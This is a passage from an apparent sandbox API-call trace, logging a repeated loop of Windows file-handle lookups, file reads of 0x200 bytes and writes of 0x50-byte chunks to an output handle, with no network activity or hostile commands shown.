(_FileHandle=1) returned 0x50 [0149.826] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.827] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.827] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, 
lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.828] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.828] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, 
lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.830] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.830] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 
[0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.831] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.831] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: 
lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.833] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.833] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 
[0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.834] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.834] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 
[0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0149.835] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.835] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.836] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.836] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] 